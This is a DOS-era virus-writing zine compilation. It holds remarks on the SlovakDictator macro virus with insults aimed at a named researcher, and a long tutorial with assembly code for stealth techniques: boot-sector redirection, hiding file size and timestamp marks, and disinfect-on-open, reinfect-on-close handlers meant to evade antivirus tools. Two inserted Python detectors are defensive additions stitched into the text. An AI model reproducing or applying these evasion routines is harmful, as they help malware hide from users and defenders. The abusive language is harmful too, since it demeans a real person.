There are two variants of this virus, WordMacro.SlovakDictator.A (described in this article) and WordMacro.SlovakDictator.B. Small changes were made in variant B, but the basics remained the same. This variant works similarly to variant A, but it displays the following dialog box:

Our plans for the near future

We would like to show the big potential of Micro$oft Visual Basic to all macro virus writers by rewriting SlovakDictator for Micro$oft Word version 8.0. We hope that the next version, written in Visual Basic, will be undetectable for a long time. We are also planning to write a fully polymorphic macro virus infecting Micro$oft Excel documents and a multiplatform virus infecting Office documents.

Conclusion

The Lamer's Macro Engine and the source code generator of the described macro virus are not presented, because each lamer, even Vesselin B. (well known as a fucking pig and shithead), is able to analyze this virus and understand it in 20 minutes. But we are not sure about that Vesselin B :). We wrote this virus within one day and we hope that the other lame macro virus writers are able to do it too. And finally, we have just invented a brand new method to speed up the internal encryption and decryption, so the next version will be much faster (and maybe it will be permutated!) :)

Big thanks go to © MacroFuck Corporation for their famous Virus Development Kit for multiple platforms. Micro$oft Word is a registered trademark of © MacroFuck Corporation.

Dedicated to:




--------- WordMacro.SlovakDictator.A --------- source code - 2nd generation --------- it is cool, isn't it ? --------- do not modify ! --------------------------------------Shared JOLSRGVAJVAVPCQSFS Shared RSTSDTQABCFRIMEDS Shared NNJVBQFICLBT Shared CTSBMNQRJVKTUN Shared RAQIEGQHTEKGMJPA Shared BLMVUIODKQID Shared TRFEHFFKDGA Shared PNFFUDGIOJHJMOJS Shared EEMSCNFUSDSA Shared IMNVDDCUIELPKGOQ Shared KILNETOHSCNTSGEB Shared FDCKUBLQVSMCLCS$(200) Shared ESBGMDHQMTV Shared UKEHLODOGSTCBCFES Shared LAOGRDANQUAUGEMDRC Shared TISEIKHODQQCGBM$(31) Shared VAHINRNESDMBBCBTNOG
















--------- WordMacro.SlovakDictator.B --------- source code - 2nd generation --------- it is cool, isn't it ? --------- do not modify ! --------------------------------------Shared JKHDBVIVFHSIOLGLEV Shared NIGFKLUPHSKEEEP Shared LEVOKOCHNNQPD Shared VNGOGKBSJINNKG Shared ATRUDJHVUTDA Shared UPMTKJGPISSNIKQEJHB Shared DUJEPAVVCNCSV Shared BQLLMJUMSKG Shared SQQVMSQFPFQOU Shared MCMAPPVBJCHTIJKLLG Shared MMPAAMLTJEJQ Shared QFOSABMOUOJTNFJEB$(200) Shared AUBQULPOOLFD Shared TACMICASEFBSRUC Shared DHFHBNUIMGVHS Shared QAUBRNSVSNMDMQPJ$(31)'OIEGDFGEGSODLPUVC Shared FLVFRFOSDHTKBSS












a handy overview by MGL/SVL exclusive for *-zine

Introduction

In the very beginning of computer viruses, when a virus was something very curious, there was no need to cover the fact of the presence of a virus in files, memory or boot sectors. But shortly after some people recognized they could make money by removing viruses, the whole thing became much harder. Of course, there was no problem coding the virus itself; the problem was to code a virus which could not be detected by antivirus software for at least some time. This time was essential for the virus to get into the wild. During virus history, two basic technologies appeared - STEALTH and POLYMORPHISM. Both technologies are well known to the virus writing community and are used in the most successful viruses. The main goal of this article is to explain how stealth works and how to code a stealth virus.

Definition and principles

Stealth is acting in a quiet and secret way in order to avoid detection, or hiding the presence of something. In the case of a computer virus this means not only hiding the presence of the virus in its place of storage (file or disc sector) but desirably (only in some cases) also avoiding detection by antivirus software. This can be done only by the virus having absolute control of the infected computer's operating system. Every critical function of the operating system has to be intercepted and its return value(s) changed to the 'normal' values - the values one would receive without the presence of the virus in the system.

Required knowledge base

To code a really working stealth virus is not a trivial task. The author has to be able to create and debug resident code - this is a must !!! The reason is very simple - WITHOUT RESIDENCY A VIRUS CAN'T BE STEALTH. Debugging of resident code is very important. Stealth that doesn't work is absolute lameness. Based on my own experiences, one of the best solutions for TSR debugging is Soft-Ice by Nu-Mega Technologies. With some minor exceptions, Soft-Ice is also good for hacking. You 'll need some good description of the operating system. In the case of MSDOS you have a shitload of possibilities, but probably the most accurate and most up-to-date description is the Interrupt List maintained by Ralf Brown. The current version is 53. The books 'Undocumented PC' and 'Undocumented DOS' are of good value for our purposes too. Besides the knowledge, do not forget to reserve some time for coding and debugging. And now - the show can go on ...

Stealth for boot viruses

This case of stealth is the simplest one. We 'll have to work with whole sectors, and this is a trivial task.

Sector 0/0/1 is the MBR in the case of a hard drive; on a floppy this sector is the boot sector. When a boot virus infects this sector, the original contents are moved elsewhere. Let's say the virus stores the original sector 0/0/1 in sector 0/0/7. This location is kinda traditional in the virus writing community, it is a heritage of the Stoned virus. But you can select any other location. After saving the original MBR/boot sector, the virus places its own copy in sector 0/0/1. Then, after rebooting, the copy of the virus in sector 0/0/1 will be loaded into memory at address 0:7C00h and executed. The virus then allocates memory for its own resident copy, moves itself to the "reserved" memory location, always hooks interrupt INT 13h (in some cases also some other interrupts) and then loads and executes the stored MBR/boot sector. Woow! The virus is now resident in memory and has gained control over INT 13h. On every disk access the virus gets control first. This is not true for disk access through the ports directly; there the virus can be detected. The main task of the viral INT 13h handler is to redirect any attempt to read/write sector 0/0/1 (where the virus is located) to 0/0/7. Attempts to write to sector 0/0/7 (now containing the stored MBR/boot sector) should be ignored. If someone tries to read sector 0/0/7, we 'll have to put zeroes into his buffer at ES:BX. Then the handler of INT 13h 'll be like this:
int_13h_entry:
        cmp     dl,80h                  ; floppy or hard drive ?
        js      flopak                  ; DL < 80h -> floppy
        push    cx
        or      dh,dh                   ; head 0 ?  (the head is in DH, not DL)
        jnz     OK
        cmp     cx,1                    ; track 0, sector 1 ?  this is what hides
        jnz     OK                      ; the presence of the virus in the MBR
        cmp     al,1                    ; stealth only when exactly 1 sector
        ja      OK                      ; is transferred
        cmp     ah,02h                  ; read
        jz      zvedavec
        cmp     ah,0ah                  ; read long (is not necessary)
        jz      zvedavec
        cmp     ah,03h                  ; write
        jz      write
        cmp     ah,0bh                  ; write long (is not necessary)
        jnz     OK
write:
zvedavec:
        mov     cl,7                    ; redirect the R/W to the stored MBR at 0/0/7
OK:
        call    emulINT13h              ; call the original INT 13h with the "good"
        pop     cx                      ; parameters and return the caller's own CX,
                                        ; which covers our tracks
        jmp     short VRATsa
flopak:
        ....                            ; here floppy access would be handled,
        ....                            ; similar to the hard drive access
        ....
VRATsa:
        retf    2                       ; return with the flags (CF/AH status) the BIOS
                                        ; left; retf 2 discards the caller's pushed flags

emulINT13h:
        pushf                           ; simulate the INT: flags + far call
        call    dword ptr cs:[original_INT13h]
        ret

But I have to say this handler is not the perfect one. It doesn't handle the situation where more than one sector is read or written; in such a case this handler can be very "unfriendly". Moreover, it doesn't preserve the sector with the stored MBR/boot sector: a read of 0/0/7 should return zeroes in the caller's buffer at ES:BX and a write to it should be dropped, as described above, and neither is in the code. Adding such code is not so hard and it is up to you ... I have to say that only a minority of viruses preserve the stored copy of the MBR/boot sector. In most cases this copy simply doesn't get overwritten anyway ...

Preserve stored stuff !!!
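As an added example (not code from the zine), here is the check a practitioner would run against a raw disk image to look for exactly the relocation described above: a second sector on track 0 / head 0 that ends in the 55AAh boot signature and carries the same partition table as the live MBR. The geometry (16 heads, 63 sectors per track), the one-track sample image and its boot-code bytes are all assumptions constructed for the example.

```python
"""Offline check for a relocated MBR/boot sector on track 0, head 0.

Added example, not code from the zine. Reads sectors straight out of a raw
image (so a resident INT 13h hook never sees the reads) and looks for a copy
of the MBR parked behind sector 1 in the Stoned tradition (0/0/7 in the text).
The disk image below is constructed inline.
"""
import struct

SECTOR = 512
BOOT_SIG = b"\x55\xaa"
PT_OFFSET = 0x1BE            # partition table: 4 x 16 bytes, then 55AAh at 0x1FE


def chs_to_lba(cyl, head, sector, heads=16, spt=63):
    """BIOS CHS triple (sectors are 1-based) -> 0-based LBA for the given geometry."""
    if sector < 1 or sector > spt or head >= heads:
        raise ValueError("CHS out of range for this geometry")
    return (cyl * heads + head) * spt + (sector - 1)


def read_sector(image, cyl, head, sector, heads=16, spt=63):
    off = chs_to_lba(cyl, head, sector, heads, spt) * SECTOR
    data = image[off:off + SECTOR]
    if len(data) != SECTOR:
        raise ValueError("sector outside image")
    return data


def partition_table(sec):
    return sec[PT_OFFSET:PT_OFFSET + 64]


def find_relocated_mbr(image, spt=63):
    """CHS sector numbers on 0/0/x (x > 1) that end in 55AAh and carry the same
    partition table as the live MBR in 0/0/1 - the classic parked-original copy."""
    mbr = read_sector(image, 0, 0, 1, spt=spt)
    if mbr[-2:] != BOOT_SIG:
        return []                      # no valid MBR at all; nothing to compare with
    hits = []
    for s in range(2, spt + 1):
        sec = read_sector(image, 0, 0, s, spt=spt)
        if sec[-2:] == BOOT_SIG and partition_table(sec) == partition_table(mbr):
            hits.append(s)
    return hits


def mbr_code_differs(image, sector, spt=63):
    """True when the boot code (bytes 0..1BDh) of the parked copy differs from the
    code now in 0/0/1, i.e. the loader that runs at boot is not the original one."""
    live = read_sector(image, 0, 0, 1, spt=spt)
    copy = read_sector(image, 0, 0, sector, spt=spt)
    return live[:PT_OFFSET] != copy[:PT_OFFSET]


def build_sample_image(spt=63, infected=True):
    """Constructed one-track image. Infected: the original MBR sits at 0/0/7 and
    0/0/1 holds different loader bytes in front of the same partition table."""
    pt = struct.pack("<B3sB3sII", 0x80, b"\x01\x01\x00", 0x06,
                     b"\x0f\x3f\xff", 63, 1_000_000).ljust(64, b"\x00")
    original = b"\xfa\x33\xc0\x8e\xd0".ljust(PT_OFFSET, b"\x90") + pt + BOOT_SIG
    replaced = b"\xea\x05\x00\xc0\x07".ljust(PT_OFFSET, b"\x00") + pt + BOOT_SIG
    sectors = [bytes(SECTOR)] * spt
    if infected:
        sectors[0] = replaced          # CHS 0/0/1
        sectors[6] = original          # CHS 0/0/7
    else:
        sectors[0] = original
    return b"".join(sectors)


if __name__ == "__main__":
    img = build_sample_image()
    for s in find_relocated_mbr(img):
        print("MBR copy at 0/0/%d, boot code differs: %s" % (s, mbr_code_differs(img, s)))
```

A hit is an indicator, not a verdict: some partitioning and boot-manager tools also keep an MBR backup in the hidden track, so compare the boot code of the two sectors and look at what sector 1 actually executes before drawing conclusions. The point that matters for the stealth discussion is that the resident handler is bypassed entirely, which is the same reason the text gives for port-level access.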

Stealth for file viruses

The number of file viruses with some stealth is greater than that of boot viruses. The principles of stealth for file viruses are as follows:

A. An infected file has an increased size. This size increase should not be visible.
B. The majority of file viruses use some change in the size, the time stamp or whatsoever to mark the file as infected. This change should be preserved and not visible.
C. Any change in the infected file should not be visible. This affects the EXE header in the case of EXE files and the initial JMP to the virus body in the case of COM files, as well as anything appended to the file.
D. In the case of a complex approach, the presence of the memory hole in which the virus resides should also be hidden.

Viruses which handle points A+B+C(+D) are full stealth viruses. Viruses which handle only point A are the so-called semi-stealth viruses. Semi-stealth doesn't need a lot of code, and I'll explain it first.

A. Semi-stealth

The main task of a semi-stealth virus is to hide the size increase of infected files. This can be easily achieved by cutting the size in the DTA after the DOS FindFirst/FindNext operations. Such a virus will have to handle not only the most common INT 21h/4Eh and INT 21h/4Fh, used by utilities of the Norton/Volkov Commander type, but also DOS FindFirst FCB / FindNext FCB - INT 21h/11h and INT 21h/12h, used by the DOS command DIR. When operating with FCBs, we have to know that there is a difference between a normal FCB and an extended FCB: the extended one is preceded by 7 bytes (an FFh flag, 5 reserved bytes and the attribute), which is why the handler below adds 7 to BX when it sees FFh at the start of the DTA. Some necessary stuff about DOS data structures you can find below. Format of File Control Block:
Offset  Size      Description                                   (Table 0648)
 -7     BYTE      extended FCB if FFh
 -6     5 BYTEs   reserved
 -1     BYTE      file attribute if extended FCB
 00h    BYTE      drive number (0 = default, 1 = A, etc)
 01h    8 BYTEs   blank-padded file name
 09h    3 BYTEs   blank-padded file extension
 0Ch    WORD      current block number
 0Eh    WORD      logical record size
 10h    DWORD     file size
 14h    WORD      date of last write (see #0952 at AX=5700h)
 16h    WORD      time of last write (see #0951 at AX=5700h) (DOS 1.1+)
 18h    8 BYTEs   reserved (see #0649,#0650,#0651,#0652,#0653)
 20h    BYTE      record within current block
 21h    DWORD     random access record number (if record size is > 64 bytes, high byte is omitted)

Note: to use an extended FCB, you must specify the address of the FFh flag at offset -7, rather than the address of the drive number field

Format of FCB reserved field for DOS 3.x:
Offset  Size      Description                                   (Table 0652)
 18h    BYTE      number of system file table entry for file
 19h    BYTE      attributes
                  bits 7,6: 00 = SHARE.EXE not loaded, disk file
                            01 = SHARE.EXE not loaded, character device
                            10 = SHARE.EXE loaded, remote file
                            11 = SHARE.EXE loaded, local file or device
                  bits 5-0: low six bits of device attribute word
 ---SHARE.EXE loaded, local file---
 1Ah    WORD      starting cluster of file on disk
 1Ch    WORD      (DOS 3.x) offset within SHARE of sharing record (see #0924 at AH=52h)
 1Eh    BYTE      file attribute
 1Fh    BYTE      ???
 ---SHARE.EXE loaded, remote file---
 1Ah    WORD      number of sector containing directory entry
 1Ch    WORD      relative cluster within file of last cluster accessed
 1Eh    BYTE      absolute cluster number of last cluster accessed
 1Fh    BYTE      ???
 ---SHARE.EXE not loaded---
 1Ah    BYTE      (low byte of device attribute word AND 0Ch) OR open mode
 1Bh    WORD      starting cluster of file
 1Dh    WORD      number of sector containing directory entry
 1Fh    BYTE      number of directory entry within sector

Note: if FCB opened on character device, DWORD at 1Ah is set to the address of the device driver header, then the BYTE at 1Ah is overwritten.

Format of FCB reserved field for DOS 5.0:
Offset  Size      Description                                   (Table 0653)
 18h    BYTE      number of system file table entry for file
 19h    BYTE      attributes
                  bits 7,6: 00 = SHARE.EXE not loaded, disk file
                            01 = SHARE.EXE not loaded, character device
                            10 = SHARE.EXE loaded, remote file
                            11 = SHARE.EXE loaded, local file or device
                  bits 5-0: low six bits of device attribute word
 ---SHARE.EXE loaded, local file---
 1Ah    WORD      starting cluster of file on disk
 1Ch    WORD      unique sequence number of sharing record
 1Eh    BYTE      file attributes
 1Fh    BYTE      unused???
 ---SHARE.EXE loaded, remote file---
 1Ah    WORD      network handle
 1Ch    DWORD     network ID
 ---SHARE not loaded, local device---
 1Ah    DWORD     pointer to device driver header
 1Eh    2 BYTEs   unused???
 ---SHARE not loaded, local file---
 1Ah    BYTE      extra info
                  bit 7: read-only attribute from SFT
                  bit 6: archive attribute from SFT
                  bits 5-0: high bits of sector number
 1Bh    WORD      starting cluster of file
 1Dh    WORD      low word of sector number containing directory entry
 1Fh    BYTE      number of directory entry within sector

Format of FindFirst data block (taken from Ralf Brown's Interrupt List)
Offset  Size      Description                                   (Table 0913)
 ---PC-DOS 3.10, PC-DOS 4.01, MS-DOS 3.2/3.3/5.0---
 00h    BYTE      drive letter (bits 0-6), remote if bit 7 set
 01h    11 BYTEs  search template
 0Ch    BYTE      search attributes
 ---DOS 2.x (and some DOS 3.x???)---
 00h    BYTE      search attributes
 01h    BYTE      drive letter
 02h    11 BYTEs  search template
 ---WILDUNIX.COM---
 00h    12 BYTEs  15-character wildcard search pattern and drive letter (packed)
 0Ch    BYTE      search attributes
 ---DOS 2.x and most 3.x---
 0Dh    WORD      entry count within directory
 0Fh    DWORD     pointer to DTA???
 13h    WORD      cluster number of start of parent directory
 ---PC-DOS 4.01, MS-DOS 3.2/3.3/5.0---
 0Dh    WORD      entry count within directory
 0Fh    WORD      cluster number of start of parent directory
 11h    4 BYTEs   reserved
 ---all versions, documented fields---
 15h    BYTE      attribute of file found
 16h    WORD      file time (see #0951 at AX=5700h)
 18h    WORD      file date (see #0952 at AX=5700h)
 1Ah    DWORD     file size
 1Eh    13 BYTEs  ASCIZ filename+extension

The strategy for semi-stealth is very simple:
1. Let the operating system perform the call.
2. If an error occurred, bail out of the interrupt.
3. Get the current DTA.
4. Is the file executable? If it isn't, return from the interrupt.
5. Check the file for infection. If the file is not infected, return from the interrupt.
6. Cut the file size in the DTA and leave the handler.

int_21:
        ....
        cmp     ah,11h                  ; this is a part of the viral
        je      DIR_STEALTH             ; INT 21h handler
        cmp     ah,12h
        je      DIR_STEALTH
        cmp     ah,4eh
        je      DTA_STEALTH
        cmp     ah,4fh
        je      DTA_STEALTH
        ....                            ; here the handler continues

DIR_STEALTH:
        call    dos_emu                 ; call the original DOS handler of INT 21h
        pushf
        pusha
        push    ds
        push    es
        or      al,al                   ; was the FCB call successful ? (AL = FFh on error)
        jnz     exit_size_fcb
        mov     ah,2fh                  ; get the DTA address to ES:BX
        call    dos_emu
        push    es
        pop     ds
        cmp     byte ptr [bx],0ffh      ; extended FCB ?  skip its 7-byte prefix
        jne     FCB_not_extended
        add     bx,7
FCB_not_extended:
        call    test_4_executable
        jc      exit_size_fcb           ; if not executable, exit
        call    test_4_infection
        jc      exit_size_fcb           ; if not infected, exit
        call    test_min_size
        jc      exit_size_fcb           ; skip files too small to be infected
                                        ; (a blind subtraction would wrap around)
        sub     word ptr [bx+1dh],virus_size    ; size = offset 1Dh of the
        sbb     word ptr [bx+1fh],0             ; FCB-format result
exit_size_fcb:
        pop     es
        pop     ds
        popa
        popf
        retf    2

DTA_STEALTH:
        call    dos_emu                 ; call the original DOS handler of INT 21h
        pushf
        pusha
        push    ds
        push    es
        jc      exit_size_dta           ; 4Eh/4Fh report an error with CF, not AL
        mov     ah,2fh                  ; get the DTA address to ES:BX
        call    dos_emu
        push    es
        pop     ds
        call    test_4_executable
        jc      exit_size_dta           ; if not executable, exit
        call    test_4_infection
        jc      exit_size_dta           ; if not infected, exit
        call    test_min_size
        jc      exit_size_dta           ; skip files too small to be infected
        sub     word ptr [bx+1ah],virus_size    ; size = offset 1Ah of the
        sbb     word ptr [bx+1ch],0             ; FindFirst data block
exit_size_dta:
        pop     es
        pop     ds
        popa
        popf
        retf    2

As you may have noticed, the code for DTA_STEALTH and DIR_STEALTH shares a lot, and it could be coded as one routine that differs only in the success test and in the offset of the size field (1Dh in the FCB-format result, 1Ah in the FindFirst data block).

B. Mark-stealth

To demonstrate the stealth of the infection mark, here is a piece of code. It was designed for a virus which uses seconds = 28 in the time stamp as its mark. This handler doesn't cover the situation where someone tries to get the time stamp (INT 21h/5700h); in a complex approach this situation can be handled too, but the user most likely won't notice any change, and so this code seems to be optimal.
int_21:
        ....
        cmp     ah,57h                  ; this is a part of the viral
        je      fn_time                 ; INT 21h handler
        ....                            ; here the handler continues

fn_time:
        or      al,al                   ; get time ?
        je      bye1                    ; that we don't handle
        pusha
        push    es
        call    test_4_executable
        jc      fn_time_exit0           ; not executable, skip
        push    cx
        call    get_time
        jnc     uninfected              ; infected ?
        pop     cx                      ; yes
        mov     ax,cx
        and     ax,1fh                  ; seconds/2 field
        xor     ax,0eh
        je      fn_time_exit0           ; 28 seconds ? then let him do it
        pop     es
        popa
        push    cx
        and     cl,11100000b            ; otherwise always set 28 seconds
        or      cl,0eh                  ; (0Eh * 2 = 28)
        jmp     set_28
fn_time_exit0:
        pop     es
        popa
        jmp     bye1
uninfected:
        pop     cx
        mov     ax,cx
        and     ax,1fh
        xor     ax,0eh                  ; set 28 seconds ?
        jnz     fn_time_exit0           ; no, exit
set_26:
        pop     es
        popa
        push    cx
        dec     cx                      ; set 26 seconds instead, so a clean
                                        ; file never carries the mark
set_28:
        call    dosemu                  ; original DOS handler (pushf + far call)
        pop     cx                      ; but show the caller his own CX (28)
        retf    2                       ; return with the flags DOS left in CF
bye1:
        jmp     dword ptr cs:[original_INT21h]
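As an added example (not the zine's code), here is the cross-view check that catches both semi-stealth and a time-stamp mark from the outside: decode the FindFirst data block DOS hands back (Table 0913 above, the structure the 4Eh/4Fh handler edits at offset 1Ah) and the raw 32-byte directory entry read from the disk itself, then compare the two. The sample entries are constructed; the 1800-byte delta and the 62-second mark are modelled on the Dark Avenger.1800 and Eddie.651 cases described later in this issue. The 28-second mark used in the handler above is a legal encoding and is deliberately not flagged, which is exactly why it is the better choice of mark.

```python
"""Cross-view check: what DOS reports about a file vs. the raw directory entry.

Added example, not code from the zine. Decodes the documented tail of a DOS
FindFirst/FindNext data block (RBIL Table 0913; the size a semi-stealth
4Eh/4Fh handler edits sits at offset 1Ah) and a raw 32-byte FAT directory
entry read from the disk itself, then compares the two views. The sample
entries below are constructed.
"""
import struct

FAT_MAX_SIZE = 0x7FFFFFFF          # no DOS/FAT file is larger than 2 GB


def decode_dos_time(word):
    """DOS packed time: bits 15-11 hours, 10-5 minutes, 4-0 seconds/2."""
    return word >> 11, (word >> 5) & 0x3F, (word & 0x1F) * 2


def encode_dos_time(hours, minutes, seconds):
    """Inverse of decode_dos_time. Seconds 60/62 encode as 30/31, values a normal
    DOS write never produces - that is what makes them usable as marks."""
    return (hours << 11) | (minutes << 5) | (seconds // 2)


def parse_find_block(buf):
    """Documented part of the find block: attr 15h, time 16h, date 18h,
    size 1Ah (DWORD), ASCIZ name 1Eh (13 bytes)."""
    if len(buf) < 0x2B:
        raise ValueError("find block too short")
    time_w, date_w, size = struct.unpack_from("<HHI", buf, 0x16)
    name = buf[0x1E:0x2B].split(b"\x00", 1)[0].decode("ascii")
    return {"attr": buf[0x15], "time": time_w, "date": date_w,
            "size": size, "name": name}


def parse_dir_entry(entry):
    """Raw FAT directory entry: name 0-7, ext 8-10, attr 11, time 22, date 24,
    first cluster 26, size 28 (DWORD)."""
    if len(entry) != 32:
        raise ValueError("directory entry must be 32 bytes")
    base = entry[0:8].rstrip(b" ").decode("ascii")
    ext = entry[8:11].rstrip(b" ").decode("ascii")
    time_w, date_w, cluster, size = struct.unpack_from("<HHHI", entry, 22)
    return {"attr": entry[11], "time": time_w, "date": date_w, "size": size,
            "cluster": cluster, "name": base + ("." + ext if ext else "")}


def timestamp_flags(time_w):
    """Flag encodings DOS itself never writes (seconds 60/62, hour > 23 ...)."""
    hours, minutes, seconds = decode_dos_time(time_w)
    flags = []
    if seconds >= 60:
        flags.append("impossible seconds %d (infection mark?)" % seconds)
    if hours > 23 or minutes > 59:
        flags.append("invalid hour/minute field")
    return flags


def compare_views(find_block, dir_entry):
    """Return the discrepancies between the DOS view and the raw on-disk view."""
    dos = parse_find_block(find_block)
    raw = parse_dir_entry(dir_entry)
    issues = []
    if dos["name"] != raw["name"]:
        issues.append("name mismatch")
    if dos["size"] != raw["size"]:
        # modulo 2^32 so a wrapped (underflowed) DOS size still yields the delta
        delta = (raw["size"] - dos["size"]) & 0xFFFFFFFF
        issues.append("size hidden from DOS: %d bytes" % delta)
    if dos["size"] > FAT_MAX_SIZE:
        issues.append("DOS-reported size is impossible (subtraction underflow)")
    issues.extend(timestamp_flags(raw["time"]))
    return issues


def build_find_block(name, attr, time_w, date_w, size):
    buf = bytearray(0x2B)
    buf[0x15] = attr
    struct.pack_into("<HHI", buf, 0x16, time_w, date_w, size)
    buf[0x1E:0x1E + len(name)] = name.encode("ascii")
    return bytes(buf)


def build_dir_entry(name, attr, time_w, date_w, cluster, size):
    base, _, ext = name.partition(".")
    entry = bytearray(32)
    entry[0:8] = base.ljust(8).encode("ascii")
    entry[8:11] = ext.ljust(3).encode("ascii")
    entry[11] = attr
    struct.pack_into("<HHHI", entry, 22, time_w, date_w, cluster, size)
    return bytes(entry)


# Constructed samples. GAME.COM: the raw entry holds the true size (12040) and a
# 62-second mark; the DOS view (through a hooked 4Fh) has 1800 bytes cut off.
DATE_1997_06_03 = (17 << 9) | (6 << 5) | 3
MARK_62 = encode_dos_time(10, 15, 62)
RAW_ENTRY = build_dir_entry("GAME.COM", 0x20, MARK_62, DATE_1997_06_03, 0x0123, 12040)
DOS_VIEW = build_find_block("GAME.COM", 0x20, MARK_62, DATE_1997_06_03, 12040 - 1800)
# TINY.COM: a 300-byte file with 651 subtracted, the Eddie.651 wrap-around case.
TINY_RAW = build_dir_entry("TINY.COM", 0x20, MARK_62, DATE_1997_06_03, 0x0200, 300)
TINY_VIEW = build_find_block("TINY.COM", 0x20, MARK_62, DATE_1997_06_03,
                             (300 - 651) & 0xFFFFFFFF)

if __name__ == "__main__":
    print("GAME.COM", compare_views(DOS_VIEW, RAW_ENTRY))
    print("TINY.COM", compare_views(TINY_VIEW, TINY_RAW))
```

The raw entry has to come from somewhere the resident handler does not mediate: a sector-level read of the directory, or the same disk mounted on a clean system. Read through INT 21h on the infected machine, both views agree by construction, which is the whole point of stealth.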

C. Full stealth

Semi-stealth is a must for full stealth viruses. To get a working full stealth virus there are two different ways: (1) disinfection-on-open / reinfection-on-close type stealth, and (2) true full stealth. It is a known fact that coding a virus of the first type is much easier than coding one of the second type. Coding viruses of either type requires some experience, so the code which follows is my well-known "meta code".

Disinfection on open / Reinfection on close.
What we want here is not only disinfection on open and reinfection on close, but also disinfection on 4B01h - load but do not execute, which is used by some debuggers to load a file into memory. Just for lamers, I point out 2 important things: after disinfecting the file you have to lseek to the BOF! Reinfection comes before the file is closed!

int_21:
        ....
        cmp     ah,3dh                  ; this is a part of the viral
        je      desinfect               ; INT 21h handler
        cmp     ah,3eh
        je      reinfect
        cmp     ah,4bh
        je      infect_file
        ....                            ; here the handler continues

infect_file:
        pusha
        push    ds
        push    es
        or      al,al                   ; 4B00h - load and execute ?
        jnz     next
        call    get_bastard             ; infect the file
exit_exec:
        pop     es
        pop     ds
        popa
        jmp     dword ptr cs:[original_INT21h]
next:
        dec     al                      ; 4B01h - load, do not execute ?
        jnz     exit_exec               ; (AL, not AX: AH still holds 4Bh)
        call    open_file_DS_DX
        call    desinfect1
        jmp     short exit_exec

get_bastard:
        ....                            ; stuff deleted
        call    open_file_DS_DX
        jc      exit_infect
get_bastard_handle:
        ....                            ; file infection here
        ....
exit_infect:
        ret

desinfect:
        call    open_file_DS_DX         ; open on behalf of the caller (R/W)
        pushf                           ; keep CF and the handle in AX
        pusha
        push    ds
        push    es
        call    desinfect1
        pop     es
        pop     ds
        popa
        popf
        retf    2

desinfect1:
comment ~
   Here you have to read the saved stuff from the infected file into some
   memory buffer. Then truncate the file to its uninfected size (by writing
   0 bytes with the file pointer set to the location where the uninfected
   file had its EOF). And last, restore the changed stuff from the memory
   buffer and lseek to the start of the file. Do not forget: if you always
   open the file in R/W mode for any DOS call, you avoid nasty SFT
   manipulation when reinfecting the file on close.
~
        .....                           ; some code :))))

The situation before a file is closed is simple... We do not have the file name, but we have the file handle. So we can reuse the part of the code which is designed to infect files on execution.
reinfect:
        pusha
        push    ds
        push    es
        call    lseek_BOF               ; file pointer back to the start
        call    get_bastard_handle      ; infect via the handle in BX
        jmp     exit_exec               ; then let DOS do the real close

True full stealth
This is the most difficult task for every coder (besides some kick-the-ass poly engine). As this problem is very complex, I'll only explain what one should do on all critical DOS functions.

INT 21h / 4E,4F,11,12
Do just normal semi-stealth. But be careful: in some cases it is necessary to switch stealth off. Such a case is e.g. a call to INT 21h/32h - Get DOS drive parameter block. Such a call is made by software like CHKDSK (as we all know, a program unfriendly to stealth viruses: it compares the sizes DOS reports with the FAT chains, so a hidden size increase shows up as an allocation error). To switch stealth on again, just wait for INT 21h/4Ch, the termination of that program.

INT 21h / 4B01h,40h
This is no problem at all. Just disinfect the file. If you are using stealth with SFT manipulation (SFT stealth), you'll have some minor (for some people major) problems. But the help is simple - refer to my "SFT stealth tutorial" for an elegant solution. You can find this tutorial in Insane Reality #8.

INT 21h / 3Dh
If you are using SFT stealth, just cut the file size in the SFT here. Then nobody can seek to the virus body, because DOS thinks EOF is at the location where EOF was before the virus body was appended. Otherwise do nothing.

INT 21h / 42h
Do not allow seeking within the virus body. You have to correct all seeks relative to the uninfected file size. Do not forget to handle all three methods (0 = from the beginning, 1 = from the current position, 2 = from EOF, where the appended body would otherwise show). In other words, just manipulate CX:DX.

INT 21h / 3Fh
This will be the most difficult part of the code. First check where the file pointer is located. Just for better imagination, an infected file looks like this:

[diagram of an infected file, from start to end: "changed stuff" (EXE header or initial JMP) | "rest of infected file" (untouched original bytes) | virus body]

If the file pointer is within the "changed stuff", read into the caller's buffer the data which would be there if the file weren't infected (from the file pointer position to the end of the "changed stuff"). Then read the rest of the requested amount of bytes. Any reading in the area marked "rest of infected file" is not dangerous. But if you detect that the read can reach the virus body, cut the read to the "legal" size. (If you're using SFT stealth, you do not need to handle this. For DOS, the viral body doesn't exist :)))))

INT 21h / 4Ch
Here you can watch the termination of particular programs. When you want to be sure that some program really ends, you can do it like this: on INT 21h/4Bh check the program name and store the current PID, which is the same as the PSP segment of the current process. On INT 21h/4Ch compare the parent's PID (the word at PSP:16h of the current PSP; you get the current PSP via mov ah,51h / int 21h, result in BX) with the stored value. If these two values are the same, the program ends.

INT 21h / 57h
Here you can stealth changes in the time stamp. Do not allow the stamp to be set to the "mark" value, and you can also avoid returning the "mark" value on INT 21h/5700h.

D. MCB stealth

This part is very short. If you want to know the principles and basics, refer to "MCB stealth" by Darkman in VLAD #6.


A. Pro - stealth
stealth effectively hides the presence of the virus in infected files
in some cases a stealth virus can spread faster against some lame AV software (in the past, not now)

B. Contra - stealth
the majority of stealth viruses can be caught in memory by a simple scan string
combining full stealth with variable-length poly is a very hard task
every stealth virus gives an exact tutorial on how to remove itself (with the virus resident, reading the file returns the clean original), and this is a very, very great pity

C. Solution:
The solution is TST. TST is a trade mark owned by Online. TST is Copyright (C) 1995-96 by Terror-6. But I am afraid you'll have to wait for Terror's next virus.

Some form of stealth is good at the beginning of an infection; it helps the virus to spread. But on the other hand, stealth has some major disadvantages.

Download attached files here

This little contribution is dedicated to the eternal memory of THE DARK AVENGER (dedicated to the probably upcoming 26th birthday of this legend (or Diana's?)). [Text in these two lines above is pure speculation. Editor] When somebody says "computer virus", it won't take long before the name Dark Avenger comes up. You ask why? If you do not know, you probably suffer from dementia or something like it. You should know that Dark Avenger is the best-known virus writer since the whole vx scene started in the late '80s.

It is well known that Dark Avenger is a native Bulgarian from the city of Sofia and a fan of the band Iron Maiden. But probably the only one who knows Dark Avenger's real identity is Dark Avenger himself. There were rumours that the real name of Dark Avenger is Vesselin Bontchev, who now resides "on some lonely island in the northern Atlantic", but Mr. Bontchev as well as Dark Avenger are both of the same opinion:

